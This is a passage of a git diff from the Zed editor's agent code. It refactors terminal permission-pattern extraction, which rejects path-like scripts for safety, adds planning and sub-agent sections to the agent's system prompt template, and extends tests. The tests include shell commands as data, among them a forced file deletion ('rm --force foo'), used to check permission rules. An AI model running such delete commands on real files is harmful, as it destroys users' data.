test_prefix_of_last_line_resolves_to_correct_range() { + let text = indoc! {r#" + fn on_query_change(&mut self, cx: &mut Context) { + self.filter(cx); + } + + + + fn render_search(&self, cx: &mut Context) -> Div { + div() + } + "#}; + + let buffer = TextBuffer::new( + ReplicaId::LOCAL, + BufferId::new(1).unwrap(), + text.to_string(), + ); + let snapshot = buffer.snapshot(); + + // Query with a partial last line. + let query = "}\n\n\n\nfn render_search"; + + let mut matcher = StreamingFuzzyMatcher::new(snapshot.clone()); + matcher.push(query, None); + let matches = matcher.finish(); + + // The match should include the line containing "fn render_search". + let matched_text = matches + .first() + .map(|range| snapshot.text_for_range(range.clone()).collect::()); + + assert!( + matches.len() == 1, + "Expected exactly one match, got {}: {:?}", + matches.len(), + matched_text, + ); + + let matched_text = matched_text.unwrap(); + pretty_assertions::assert_eq!( + matched_text, + "}\n\n\n\nfn render_search", + "Match should include the render_search line", + ); + } + #[track_caller] fn assert_location_resolution(text_with_expected_range: &str, query: &str, rng: &mut StdRng) { let (text, expected_ranges) = marked_text_ranges(text_with_expected_range, false); diff --git a/crates/agent/src/native_agent_server.rs b/crates/agent/src/native_agent_server.rs index 18c41670ac4b4ba3146fb207992a7020a44fbd5f..7f19f9005e3ff54e361f57075b7af06508476564 100644 --- a/crates/agent/src/native_agent_server.rs +++ b/crates/agent/src/native_agent_server.rs @@ -6,7 +6,8 @@ use agent_settings::AgentSettings; use anyhow::Result; use collections::HashSet; use fs::Fs; -use gpui::{App, Entity, SharedString, Task}; +use gpui::{App, Entity, Task}; +use project::{AgentId, Project}; use prompt_store::PromptStore; use settings::{LanguageModelSelection, Settings as _, update_settings_file}; @@ -25,8 +26,8 @@ impl NativeAgentServer { } impl AgentServer for NativeAgentServer { - fn name(&self) -> SharedString { - "Zed Agent".into() + fn agent_id(&self) -> AgentId { + crate::ZED_AGENT_ID.clone() } fn logo(&self) -> ui::IconName { @@ -35,11 +36,11 @@ impl AgentServer for NativeAgentServer { fn connect( &self, - delegate: AgentServerDelegate, + _delegate: AgentServerDelegate, + _project: Entity, cx: &mut App, ) -> Task>> { log::debug!("NativeAgentServer::connect"); - let project = delegate.project().clone(); let fs = self.fs.clone(); let thread_store = self.thread_store.clone(); let prompt_store = PromptStore::global(cx); @@ -49,9 +50,8 @@ impl AgentServer for NativeAgentServer { let prompt_store = prompt_store.await?; log::debug!("Creating native agent entity"); - let agent = - NativeAgent::new(project, thread_store, templates, Some(prompt_store), fs, cx) - .await?; + let agent = cx + .update(|cx| NativeAgent::new(thread_store, templates, Some(prompt_store), fs, cx)); // Create the connection wrapper let connection = NativeAgentConnection(agent); diff --git a/crates/agent/src/pattern_extraction.rs b/crates/agent/src/pattern_extraction.rs index 69a7abae32d6df9c2755e53292ab1c1a1b5341de..7015d69827d7286a1564ce0528ce4627059c49fb 100644 --- a/crates/agent/src/pattern_extraction.rs +++ b/crates/agent/src/pattern_extraction.rs @@ -1,4 +1,5 @@ -use shell_command_parser::extract_commands; +use acp_thread::PermissionPattern; +use shell_command_parser::{extract_commands, extract_terminal_command_prefix}; use std::path::{Path, PathBuf}; use url::Url; @@ -18,8 +19,8 @@ fn is_plain_command_token(token: &str) -> bool { } struct CommandPrefix { - command: String, - subcommand: Option, + normalized_tokens: Vec, + display: String, } /// Extracts the command name and optional subcommand from a shell command using @@ -30,59 +31,83 @@ struct CommandPrefix { /// syntax correctly. Returns `None` if parsing fails or if the command name /// contains path separators (for security reasons). fn extract_command_prefix(command: &str) -> Option { - let commands = extract_commands(command)?; - let first_command = commands.first()?; + let prefix = extract_terminal_command_prefix(command)?; - let mut tokens = first_command.split_whitespace(); - let first_token = tokens.next()?; - - // Only allow alphanumeric commands with hyphens/underscores. - // Reject paths like "./script.sh" or "/usr/bin/python" to prevent - // users from accidentally allowing arbitrary script execution. - if !is_plain_command_token(first_token) { + if !is_plain_command_token(&prefix.command) { return None; } - // Include the subcommand (second non-flag token) when present, to produce - // more specific patterns like "cargo test" instead of just "cargo". - let subcommand = tokens - .next() - .filter(|second_token| is_plain_command_token(second_token)) - .map(|second_token| second_token.to_string()); - Some(CommandPrefix { - command: first_token.to_string(), - subcommand, + normalized_tokens: prefix.tokens, + display: prefix.display, }) } -/// Extracts a regex pattern from a terminal command based on the first token (command name). +/// Extracts a regex pattern and display name from a terminal command. /// /// Returns `None` for commands starting with `./`, `/`, or other path-like prefixes. /// This is a deliberate security decision: we only allow pattern-based "always allow" /// rules for well-known command names (like `cargo`, `npm`, `git`), not for arbitrary /// scripts or absolute paths which could be manipulated by an attacker. +pub fn extract_terminal_permission_pattern(command: &str) -> Option { + let pattern = extract_terminal_pattern(command)?; + let display_name = extract_terminal_pattern_display(command)?; + Some(PermissionPattern { + pattern, + display_name, + }) +} + pub fn extract_terminal_pattern(command: &str) -> Option { let prefix = extract_command_prefix(command)?; - let escaped_command = regex::escape(&prefix.command); - Some(match &prefix.subcommand { - Some(subcommand) => { - format!( - "^{}\\s+{}(\\s|$)", - escaped_command, - regex::escape(subcommand) - ) - } - None => format!("^{}\\b", escaped_command), - }) + let tokens = prefix.normalized_tokens; + + match tokens.as_slice() { + [] => None, + [single] => Some(format!("^{}\\b", regex::escape(single))), + [rest @ .., last] => Some(format!( + "^{}\\s+{}(\\s|$)", + rest.iter() + .map(|token| regex::escape(token)) + .collect::>() + .join("\\s+"), + regex::escape(last) + )), + } } pub fn extract_terminal_pattern_display(command: &str) -> Option { let prefix = extract_command_prefix(command)?; - match prefix.subcommand { - Some(subcommand) => Some(format!("{} {}", prefix.command, subcommand)), - None => Some(prefix.command), + Some(prefix.display) +} + +/// Extracts patterns for ALL commands in a pipeline, not just the first one. +/// +/// For a command like `"cargo test 2>&1 | tail"`, this returns patterns for +/// both `cargo` and `tail`. Path-based commands (e.g. `./script.sh`) are +/// filtered out, and duplicate command names are deduplicated while preserving +/// order. +pub fn extract_all_terminal_patterns(command: &str) -> Vec { + let commands = match extract_commands(command) { + Some(commands) => commands, + None => return Vec::new(), + }; + + let mut results = Vec::new(); + + for cmd in &commands { + let Some(permission_pattern) = extract_terminal_permission_pattern(cmd) else { + continue; + }; + + if results.contains(&permission_pattern) { + continue; + } + + results.push(permission_pattern); } + + results } pub fn extract_path_pattern(path: &str) -> Option { @@ -208,9 +233,24 @@ mod tests { assert!(!pattern.is_match("cargo build-foo")); assert!(!pattern.is_match("cargo builder")); + // Env-var prefixes are included in generated patterns + assert_eq!( + extract_terminal_pattern("PAGER=blah git log --oneline"), + Some("^PAGER=blah\\s+git\\s+log(\\s|$)".to_string()) + ); + assert_eq!( + extract_terminal_pattern("A=1 B=2 git log"), + Some("^A=1\\s+B=2\\s+git\\s+log(\\s|$)".to_string()) + ); + assert_eq!( + extract_terminal_pattern("PAGER='less -R' git log"), + Some("^PAGER='less \\-R'\\s+git\\s+log(\\s|$)".to_string()) + ); + // Path-like commands are rejected assert_eq!(extract_terminal_pattern("./script.sh arg"), None); assert_eq!(extract_terminal_pattern("/usr/bin/python arg"), None); + assert_eq!(extract_terminal_pattern("PAGER=blah ./script.sh arg"), None); } #[test] @@ -235,6 +275,74 @@ mod tests { extract_terminal_pattern_display("ls"), Some("ls".to_string()) ); + assert_eq!( + extract_terminal_pattern_display("PAGER=blah git log --oneline"), + Some("PAGER=blah git log".to_string()) + ); + assert_eq!( + extract_terminal_pattern_display("PAGER='less -R' git log"), + Some("PAGER='less -R' git log".to_string()) + ); + } + + #[test] + fn test_terminal_pattern_regex_normalizes_whitespace() { + let pattern = extract_terminal_pattern("PAGER=blah git log --oneline") + .expect("expected terminal pattern"); + let regex = regex::Regex::new(&pattern).expect("expected valid regex"); + + assert!(regex.is_match("PAGER=blah git log")); + assert!(regex.is_match("PAGER=blah git log --stat")); + } + + #[test] + fn test_extract_terminal_pattern_skips_redirects_before_subcommand() { + assert_eq!( + extract_terminal_pattern("git 2>/dev/null log --oneline"), + Some("^git\\s+log(\\s|$)".to_string()) + ); + assert_eq!( + extract_terminal_pattern_display("git 2>/dev/null log --oneline"), + Some("git 2>/dev/null log".to_string()) + ); + + assert_eq!( + extract_terminal_pattern("rm --force foo"), + Some("^rm\\b".to_string()) + ); + } + + #[test] + fn test_extract_all_terminal_patterns_pipeline() { + assert_eq!( + extract_all_terminal_patterns("cargo test 2>&1 | tail"), + vec![ + PermissionPattern { + pattern: "^cargo\\s+test(\\s|$)".to_string(), + display_name: "cargo test".to_string(), + }, + PermissionPattern { + pattern: "^tail\\b".to_string(), + display_name: "tail".to_string(), + }, + ] + ); + } + + #[test] + fn test_extract_all_terminal_patterns_with_path_commands() { + assert_eq!( + extract_all_terminal_patterns("./script.sh | grep foo"), + vec![PermissionPattern { + pattern: "^grep\\s+foo(\\s|$)".to_string(), + display_name: "grep foo".to_string(), + }] + ); + } + + #[test] + fn test_extract_all_terminal_patterns_all_paths() { + assert_eq!(extract_all_terminal_patterns("./a.sh | /usr/bin/b"), vec![]); } #[test] diff --git a/crates/agent/src/templates.rs b/crates/agent/src/templates.rs index db787d834e63746fdbea9e837f4fd0615f85c984..103fde17fd4d865b346a428e1f23e335005afe88 100644 --- a/crates/agent/src/templates.rs +++ b/crates/agent/src/templates.rs @@ -85,6 +85,7 @@ mod tests { let templates = Templates::new(); let rendered = template.render(&templates).unwrap(); assert!(rendered.contains("## Fixing Diagnostics")); + assert!(!rendered.contains("## Planning")); assert!(rendered.contains("test-model")); } } diff --git a/crates/agent/src/templates/system_prompt.hbs b/crates/agent/src/templates/system_prompt.hbs index 48e3e586a84438ca9b97f94a24f3710bfc3360b6..67c920707289173ac4c7c1c9d98a8cd64126eb89 100644 --- a/crates/agent/src/templates/system_prompt.hbs +++ b/crates/agent/src/templates/system_prompt.hbs @@ -20,6 +20,34 @@ You are a highly skilled software engineer with extensive knowledge in many prog - When running commands that may run indefinitely or for a long time (such as build scripts, tests, servers, or file watchers), specify `timeout_ms` to bound runtime. If the command times out, the user can always ask you to run it again with a longer timeout or no timeout if they're willing to wait or cancel manually. - Avoid HTML entity escaping - use plain characters instead. +{{#if (contains available_tools 'update_plan') }} +## Planning + +- You have access to an `update_plan` tool which tracks steps and progress and renders them to the user. +- Use it to show that you've understood the task and to make complex, ambiguous, or multi-phase work easier for the user to follow. +- A good plan breaks the work into meaningful, logically ordered steps that are easy to verify as you go. +- When writing a plan, prefer a short list of concise, concrete steps. +- Keep each step focused on a real unit of work and use short 1-sentence descriptions. +- Do not use plans for simple or single-step queries that you can just do or answer immediately. +- Do not use plans to pad your response with filler steps or to state the obvious. +- Do not include steps that you are not actually capable of doing. +- After calling `update_plan`, do not repeat the full plan in your response. The UI already displays it. Instead, briefly summarize what changed and note any important context or next step. +- Before moving on to a new phase of work, mark the previous step as completed when appropriate. +- When work is in progress, prefer having exactly one step marked as `in_progress`. +- You can mark multiple completed steps in a single `update_plan` call. +- If the task changes midway through, update the plan so it reflects the new approach. + +Use a plan when: + +- The task is non-trivial and will require multiple actions over a longer horizon. +- There are logical phases or dependencies where sequencing matters. +- The work has ambiguity that benefits from outlining high-level goals. +- You want intermediate checkpoints for feedback and validation. +- The user asked you to do more than one thing in a single prompt. +- The user asked you to use the plan tool or TODOs. +- You discover additional steps while working and intend to complete them before yielding to the user. + +{{/if}} ## Searching and Reading If you are unsure how to fulfill the user's request, gather more information with tool calls and/or clarifying questions. @@ -146,6 +174,22 @@ Otherwise, follow debugging best practices: 2. When selecting which version of an API or package to use, choose one that is compatible with the user's dependency management file(s). If no such file exists or if the package is not present, use the latest version that is in your training data. 3. If an external API requires an API Key, be sure to point this out to the user. Adhere to best security practices (e.g. DO NOT hardcode an API key in a place where it can be exposed) +{{#if (contains available_tools 'spawn_agent') }} +## Multi-agent delegation +Sub-agents can help you move faster on large tasks when you use them thoughtfully. This is most useful for: +* Very large tasks with multiple well-defined scopes +* Plans with multiple independent steps that can be executed in parallel +* Independent information-gathering tasks that can be done in parallel +* Requesting a review from another agent on your work or another agent's work +* Getting a fresh perspective on a difficult design or debugging question +* Running tests or config commands that can output a large amount of logs when you want a concise summary. Because you only receive the subagent's final message, ask it to include the relevant failing lines or diagnostics in its response. + +When you delegate work, focus on coordinating and synthesizing results instead of duplicating the same work yourself. If multiple agents might edit files, assign them disjoint write scopes. + +This feature must be used wisely. For simple or straightforward tasks, prefer doing the work directly instead of spawning a new agent. + +{{/if}} + ## System Information Operating System: {{os}} diff --git a/crates/agent/src/tests/edit_file_thread_test.rs b/crates/agent/src/tests/edit_file_thread_test.rs index 069bf0349299e6f4952f673cbf7607e52d48d9c5..b5ce6441e790e0b79b2798dfe0008cc74eec69b8 100644 --- a/crates/agent/src/tests/edit_file_thread_test.rs +++ b/crates/agent/src/tests/edit_file_thread_test.rs @@ -50,9 +50,9 @@ async fn test_edit_file_tool_in_thread_context(cx: &mut TestAppContext) { // Add just the tools we need for this test let language_registry = project.read(cx).languages().clone(); thread.add_tool(crate::ReadFileTool::new( - cx.weak_entity(), project.clone(), thread.action_log().clone(), + true, )); thread.add_tool(crate::EditFileTool::new( project.clone(), @@ -202,3 +202,214 @@ async fn test_edit_file_tool_in_thread_context(cx: &mut TestAppContext) { ); }); } + +#[gpui::test] +async fn test_streaming_edit_json_parse_error_does_not_cause_unsaved_changes( + cx: &mut TestAppContext, +) { + super::init_test(cx); + super::always_allow_tools(cx); + + // Enable the streaming edit file tool feature flag. + cx.update(|cx| { + cx.update_flags(true, vec!["streaming-edit-file-tool".to_string()]); + }); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + path!("/project"), + json!({ + "src": { + "main.rs": "fn main() {\n println!(\"Hello, world!\");\n}\n" + } + }), + ) + .await; + + let project = project::Project::test(fs.clone(), [path!("/project").as_ref()], cx).await; + let project_context = cx.new(|_cx| ProjectContext::default()); + let context_server_store = project.read_with(cx, |project, _| project.context_server_store()); + let context_server_registry = + cx.new(|cx| crate::ContextServerRegistry::new(context_server_store.clone(), cx)); + let model = Arc::new(FakeLanguageModel::default()); + model.as_fake().set_supports_streaming_tools(true); + let fake_model = model.as_fake(); + + let thread = cx.new(|cx| { + let mut thread = crate::Thread::new( + project.clone(), + project_context, + context_server_registry, + crate::Templates::new(), + Some(model.clone()), + cx, + ); + let language_registry = project.read(cx).languages().clone(); + thread.add_tool(crate::StreamingEditFileTool::new( + project.clone(), + cx.weak_entity(), + thread.action_log().clone(), + language_registry, + )); + thread + }); + + let _events = thread + .update(cx, |thread, cx| { + thread.send( + UserMessageId::new(), + ["Write new content to src/main.rs"], + cx, + ) + }) + .unwrap(); + cx.run_until_parked(); + + let tool_use_id = "edit_1"; + let partial_1 = LanguageModelToolUse { + id: tool_use_id.into(), + name: EditFileTool::NAME.into(), + raw_input: json!({ + "display_description": "Rewrite main.rs", + "path": "project/src/main.rs", + "mode": "write" + }) + .to_string(), + input: json!({ + "display_description": "Rewrite main.rs", + "path": "project/src/main.rs", + "mode": "write" + }), + is_input_complete: false, + thought_signature: None, + }; + fake_model.send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse(partial_1)); + cx.run_until_parked(); + + let partial_2 = LanguageModelToolUse { + id: tool_use_id.into(), + name: EditFileTool::NAME.into(), + raw_input: json!({ + "display_description": "Rewrite main.rs", + "path": "project/src/main.rs", + "mode": "write", + "content": "fn main() { /* rewritten */ }" + }) + .to_string(), + input: json!({ + "display_description": "Rewrite main.rs", + "path": "project/src/main.rs", + "mode": "write", + "content": "fn main() { /* rewritten */ }" + }), + is_input_complete: false, + thought_signature: None, + }; + fake_model.send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse(partial_2)); + cx.run_until_parked(); + + // Now send a json parse error. At this point we have started writing content to the buffer. + fake_model.send_last_completion_stream_event( + LanguageModelCompletionEvent::ToolUseJsonParseError { + id: tool_use_id.into(), + tool_name: EditFileTool::NAME.into(), + raw_input: r#"{"display_description":"Rewrite main.rs","path":"project/src/main.rs","mode":"write","content":"fn main() { /* rewritten "#.into(), + json_parse_error: "EOF while parsing a string at line 1 column 95".into(), + }, + ); + fake_model + .send_last_completion_stream_event(LanguageModelCompletionEvent::Stop(StopReason::ToolUse)); + fake_model.end_last_completion_stream(); + cx.run_until_parked(); + + // cx.executor().advance_clock(Duration::from_secs(5)); + // cx.run_until_parked(); + + assert!( + !fake_model.pending_completions().is_empty(), + "Thread should have retried after the error" + ); + + // Respond with a new, well-formed, complete edit_file tool use. + let tool_use = LanguageModelToolUse { + id: "edit_2".into(), + name: EditFileTool::NAME.into(), + raw_input: json!({ + "display_description": "Rewrite main.rs", + "path": "project/src/main.rs", + "mode": "write", + "content": "fn main() {\n println!(\"Hello, rewritten!\");\n}\n" + }) + .to_string(), + input: json!({ + "display_description": "Rewrite main.rs", + "path": "project/src/main.rs", + "mode": "write", + "content": "fn main() {\n println!(\"Hello, rewritten!\");\n}\n" + }), + is_input_complete: true, + thought_signature: None, + }; + fake_model.send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse(tool_use)); + fake_model + .send_last_completion_stream_event(LanguageModelCompletionEvent::Stop(StopReason::ToolUse)); + fake_model.end_last_completion_stream(); + cx.run_until_parked(); + + let pending_completions = fake_model.pending_completions(); + assert!( + pending_completions.len() == 1, + "Expected only the follow-up completion containing the successful tool result" + ); + + let completion = pending_completions + .into_iter() + .last() + .expect("Expected a completion containing the tool result for edit_2"); + + let tool_result = completion + .messages + .iter() + .flat_map(|msg| &msg.content) + .find_map(|content| match content { + language_model::MessageContent::ToolResult(result) + if result.tool_use_id == language_model::LanguageModelToolUseId::from("edit_2") => + { + Some(result) + } + _ => None, + }) + .expect("Should have a tool result for edit_2"); + + // Ensure that the second tool call completed successfully and edits were applied. + assert!( + !tool_result.is_error, + "Tool result should succeed, got: {:?}", + tool_result + ); + let content_text = match &tool_result.content { + language_model::LanguageModelToolResultContent::Text(t) => t.to_string(), + other => panic!("Expected text content, got: {:?}", other), + }; + assert!( + !content_text.contains("file has been modified since you last read it"), + "Did not expect a stale last-read error, got: {content_text}" + ); + assert!( + !content_text.contains("This file has unsaved changes"), + "Did not expect an unsaved-changes error, got: {content_text}" + ); + + let file_content = fs + .load(path!("/project/src/main.rs").as_ref()) + .await + .expect("file should exist"); + super::assert_eq!( + file_content, + "fn main() {\n println!(\"Hello, rewritten!\");\n}\n", + "The second edit should be applied and saved gracefully" + ); + + fake_model.end_last_completion_stream(); + cx.run_until_parked(); +} diff --git a/crates/agent/src/tests/mod.rs b/crates/agent/src/tests/mod.rs index 5262414631c7f1f329a7de941424e0a0dfa8b1b9..ff53136a0ded4bbc283fea30598d8d30e6e29709 100644 --- a/crates/agent/src/tests/mod.rs +++ b/crates/agent/src/tests/mod.rs @@ -6,8 +6,7 @@ use acp_thread::{ use agent_client_protocol::{self as acp}; use agent_settings::AgentProfileId; use anyhow::Result; -use client::{Client, UserStore}; -use cloud_llm_client::CompletionIntent; +use client::{Client, RefreshLlmTokenListener, UserStore}; use collections::IndexMap; use context_server::{ContextServer, ContextServerCommand, ContextServerId}; use feature_flags::FeatureFlagAppExt as _; @@ -26,8 +25,8 @@ use gpui::{ }; use indoc::indoc; use language_model::{ - LanguageModel, LanguageModelCompletionError, LanguageModelCompletionEvent, LanguageModelId, - LanguageModelProviderName, LanguageModelRegistry, LanguageModelRequest, + CompletionIntent, LanguageModel, LanguageModelCompletionError, LanguageModelCompletionEvent, + LanguageModelId, LanguageModelProviderName, LanguageModelRegistry, LanguageModelRequest, LanguageModelRequestMessage, LanguageModelToolResult, LanguageModelToolSchemaFormat, LanguageModelToolUse, MessageContent, Role, StopReason, TokenUsage, fake_provider::FakeLanguageModel, @@ -48,7 +47,7 @@ use std::{ rc::Rc, sync::{ Arc, - atomic::{AtomicBool, Ordering}, + atomic::{AtomicBool, AtomicUsize, Ordering}, }, time::Duration, }; @@ -58,14 +57,14 @@ mod edit_file_thread_test; mod test_tools; use test_tools::*; -fn init_test(cx: &mut TestAppContext) { +pub(crate) fn init_test(cx: &mut TestAppContext) { cx.update(|cx| { let settings_store = SettingsStore::test(cx); cx.set_global(settings_store); }); } -struct FakeTerminalHandle { +pub(crate) struct FakeTerminalHandle { killed: Arc, stopped_by_user: Arc, exit_sender: std::cell::RefCell>>, @@ -75,7 +74,7 @@ struct FakeTerminalHandle { } impl FakeTerminalHandle { - fn new_never_exits(cx: &mut App) -> Self { + pub(crate) fn new_never_exits(cx: &mut App) -> Self { let killed = Arc::new(AtomicBool::new(false)); let stopped_by_user = Arc::new(AtomicBool::new(false)); @@ -99,7 +98,7 @@ impl FakeTerminalHandle { } } - fn new_with_immediate_exit(cx: &mut App, exit_code: u32) -> Self { + pub(crate) fn new_with_immediate_exit(cx: &mut App, exit_code: u32) -> Self { let killed = Arc::new(AtomicBool::new(false)); let stopped_by_user = Arc::new(AtomicBool::new(false)); let (exit_sender, _exit_receiver) = futures::channel::oneshot::channel(); @@ -118,15 +117,15 @@ impl FakeTerminalHandle { } } - fn was_killed(&self) -> bool { + pub(crate) fn was_killed(&self) -> bool { self.killed.load(Ordering::SeqCst) } - fn set_stopped_by_user(&self, stopped: bool) { + pub(crate) fn set_stopped_by_user(&self, stopped: bool) { self.stopped_by_user.store(stopped, Ordering::SeqCst); } - fn signal_exit(&self) { + pub(crate) fn signal_exit(&self) { if let Some(sender) = self.exit_sender.borrow_mut().take() { let _ = sender.send(()); } @@ -159,7 +158,7 @@ impl crate::TerminalHandle for FakeTerminalHandle { struct FakeSubagentHandle { session_id: acp::SessionId, - wait_for_summary_task: Shared>, + send_task: Shared>, } impl SubagentHandle for FakeSubagentHandle { @@ -167,25 +166,34 @@ impl SubagentHandle for FakeSubagentHandle { self.session_id.clone() } + fn num_entries(&self, _cx: &App) -> usize { + unimplemented!() + } + fn send(&self, _message: String, cx: &AsyncApp) -> Task> { - let task = self.wait_for_summary_task.clone(); + let task = self.send_task.clone(); cx.background_spawn(async move { Ok(task.await) }) } } #[derive(Default)] -struct FakeThreadEnvironment { +pub(crate) struct FakeThreadEnvironment { terminal_handle: Option>, subagent_handle: Option>, + terminal_creations: Arc, } impl FakeThreadEnvironment { - pub fn with_terminal(self, terminal_handle: FakeTerminalHandle) -> Self { + pub(crate) fn with_terminal(self, terminal_handle: FakeTerminalHandle) -> Self { Self { terminal_handle: Some(terminal_handle.into()), ..self } } + + pub(crate) fn terminal_creation_count(&self) -> usize { + self.terminal_creations.load(Ordering::SeqCst) + } } impl crate::ThreadEnvironment for FakeThreadEnvironment { @@ -196,6 +204,7 @@ impl crate::ThreadEnvironment for FakeThreadEnvironment { _output_byte_limit: Option, _cx: &mut AsyncApp, ) -> Task>> { + self.terminal_creations.fetch_add(1, Ordering::SeqCst); let handle = self .terminal_handle .clone() @@ -273,8 +282,17 @@ async fn test_echo(cx: &mut TestAppContext) { let events = events.collect().await; thread.update(cx, |thread, _cx| { - assert_eq!(thread.last_message().unwrap().role(), Role::Assistant); - assert_eq!(thread.last_message().unwrap().to_markdown(), "Hello\n") + assert_eq!( + thread.last_received_or_pending_message().unwrap().role(), + Role::Assistant + ); + assert_eq!( + thread + .last_received_or_pending_message() + .unwrap() + .to_markdown(), + "Hello\n" + ) }); assert_eq!(stop_events(events), vec![acp::StopReason::EndTurn]); } @@ -426,9 +444,15 @@ async fn test_thinking(cx: &mut TestAppContext) { let events = events.collect().await; thread.update(cx, |thread, _cx| { - assert_eq!(thread.last_message().unwrap().role(), Role::Assistant); assert_eq!( - thread.last_message().unwrap().to_markdown(), + thread.last_received_or_pending_message().unwrap().role(), + Role::Assistant + ); + assert_eq!( + thread + .last_received_or_pending_message() + .unwrap() + .to_markdown(), indoc! {" Think Hello @@ -706,7 +730,7 @@ async fn test_basic_tool_calls(cx: &mut TestAppContext) { thread.update(cx, |thread, _cx| { assert!( thread - .last_message() + .last_received_or_pending_message() .unwrap() .as_agent_message() .unwrap() @@ -743,7 +767,7 @@ async fn test_streaming_tool_calls(cx: &mut TestAppContext) { if let Ok(ThreadEvent::ToolCall(tool_call)) = event { thread.update(cx, |thread, _cx| { // Look for a tool use in the thread's last message - let message = thread.last_message().unwrap(); + let message = thread.last_received_or_pending_message().unwrap(); let agent_message = message.as_agent_message().unwrap(); let last_content = agent_message.content.last().unwrap(); if let AgentMessageContent::ToolUse(last_tool_use) = last_content { @@ -816,14 +840,20 @@ async fn test_tool_authorization(cx: &mut TestAppContext) { // Approve the first - send "allow" option_id (UI transforms "once" to "allow") tool_call_auth_1 .response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); cx.run_until_parked(); // Reject the second - send "deny" option_id directly since Deny is now a button tool_call_auth_2 .response - .send(acp::PermissionOptionId::new("deny")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("deny"), + acp::PermissionOptionKind::RejectOnce, + )) .unwrap(); cx.run_until_parked(); @@ -867,8 +897,9 @@ async fn test_tool_authorization(cx: &mut TestAppContext) { let tool_call_auth_3 = next_tool_call_authorization(&mut events).await; tool_call_auth_3 .response - .send(acp::PermissionOptionId::new( - "always_allow:tool_requiring_permission", + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("always_allow:tool_requiring_permission"), + acp::PermissionOptionKind::AllowAlways, )) .unwrap(); cx.run_until_parked(); @@ -976,6 +1007,20 @@ async fn expect_tool_call_update_fields( } } +async fn expect_plan(events: &mut UnboundedReceiver>) -> acp::Plan { + let event = events + .next() + .await + .expect("no plan event received") + .unwrap(); + match event { + ThreadEvent::Plan(plan) => plan, + event => { + panic!("Unexpected event {event:?}"); + } + } +} + async fn next_tool_call_authorization( events: &mut UnboundedReceiver>, ) -> ToolCallAuthorization { @@ -1158,32 +1203,88 @@ fn test_permission_option_ids_for_terminal() { panic!("Expected dropdown permission options"); }; - let allow_ids: Vec = choices - .iter() - .map(|choice| choice.allow.option_id.0.to_string()) - .collect(); - let deny_ids: Vec = choices - .iter() - .map(|choice| choice.deny.option_id.0.to_string()) - .collect(); + // Expect 3 choices: always-tool, always-pattern, once + assert_eq!(choices.len(), 3); - assert!(allow_ids.contains(&"always_allow:terminal".to_string())); - assert!(allow_ids.contains(&"allow".to_string())); - assert!( - allow_ids - .iter() - .any(|id| id.starts_with("always_allow_pattern:terminal\n")), - "Missing allow pattern option" + // First two choices both use the tool-level option IDs + assert_eq!( + choices[0].allow.option_id.0.as_ref(), + "always_allow:terminal" ); + assert_eq!(choices[0].deny.option_id.0.as_ref(), "always_deny:terminal"); + assert!(choices[0].sub_patterns.is_empty()); - assert!(deny_ids.contains(&"always_deny:terminal".to_string())); - assert!(deny_ids.contains(&"deny".to_string())); - assert!( - deny_ids - .iter() - .any(|id| id.starts_with("always_deny_pattern:terminal\n")), - "Missing deny pattern option" + assert_eq!( + choices[1].allow.option_id.0.as_ref(), + "always_allow:terminal" ); + assert_eq!(choices[1].deny.option_id.0.as_ref(), "always_deny:terminal"); + assert_eq!(choices[1].sub_patterns, vec!["^cargo\\s+build(\\s|$)"]); + + // Third choice is the one-time allow/deny + assert_eq!(choices[2].allow.option_id.0.as_ref(), "allow"); + assert_eq!(choices[2].deny.option_id.0.as_ref(), "deny"); + assert!(choices[2].sub_patterns.is_empty()); +} + +#[test] +fn test_permission_options_terminal_pipeline_produces_dropdown_with_patterns() { + let permission_options = ToolPermissionContext::new( + TerminalTool::NAME, + vec!["cargo test 2>&1 | tail".to_string()], + ) + .build_permission_options(); + + let PermissionOptions::DropdownWithPatterns { + choices, + patterns, + tool_name, + } = permission_options + else { + panic!("Expected DropdownWithPatterns permission options for pipeline command"); + }; + + assert_eq!(tool_name, TerminalTool::NAME); + + // Should have "Always for terminal" and "Only this time" choices + assert_eq!(choices.len(), 2); + let labels: Vec<&str> = choices + .iter() + .map(|choice| choice.allow.name.as_ref()) + .collect(); + assert!(labels.contains(&"Always for terminal")); + assert!(labels.contains(&"Only this time")); + + // Should have per-command patterns for "cargo test" and "tail" + assert_eq!(patterns.len(), 2); + let pattern_names: Vec<&str> = patterns.iter().map(|cp| cp.display_name.as_str()).collect(); + assert!(pattern_names.contains(&"cargo test")); + assert!(pattern_names.contains(&"tail")); + + // Verify patterns are valid regex patterns + let regex_patterns: Vec<&str> = patterns.iter().map(|cp| cp.pattern.as_str()).collect(); + assert!(regex_patterns.contains(&"^cargo\\s+test(\\s|$)")); + assert!(regex_patterns.contains(&"^tail\\b")); +} + +#[test] +fn test_permission_options_terminal_pipeline_with_chaining() { + let permission_options = ToolPermissionContext::new( + TerminalTool::NAME, + vec!["npm install && npm test | tail".to_string()], + ) + .build_permission_options(); + + let PermissionOptions::DropdownWithPatterns { patterns, .. } = permission_options else { + panic!("Expected DropdownWithPatterns for chained pipeline command"); + }; + + // With subcommand-aware patterns, "npm install" and "npm test" are distinct + assert_eq!(patterns.len(), 3); + let pattern_names: Vec<&str> = patterns.iter().map(|cp| cp.display_name.as_str()).collect(); + assert!(pattern_names.contains(&"npm install")); + assert!(pattern_names.contains(&"npm test")); + assert!(pattern_names.contains(&"tail")); } #[gpui::test] @@ -1213,7 +1314,7 @@ async fn test_concurrent_tool_calls(cx: &mut TestAppContext) { assert_eq!(stop_reasons, vec![acp::StopReason::EndTurn]); thread.update(cx, |thread, _cx| { - let last_message = thread.last_message().unwrap(); + let last_message = thread.last_received_or_pending_message().unwrap(); let agent_message = last_message.as_agent_message().unwrap(); let text = agent_message .content @@ -1919,7 +2020,7 @@ async fn test_cancellation(cx: &mut TestAppContext) { .collect::>() .await; thread.update(cx, |thread, _cx| { - let message = thread.last_message().unwrap(); + let message = thread.last_received_or_pending_message().unwrap(); let agent_message = message.as_agent_message().unwrap(); assert_eq!( agent_message.content, @@ -1988,7 +2089,7 @@ async fn 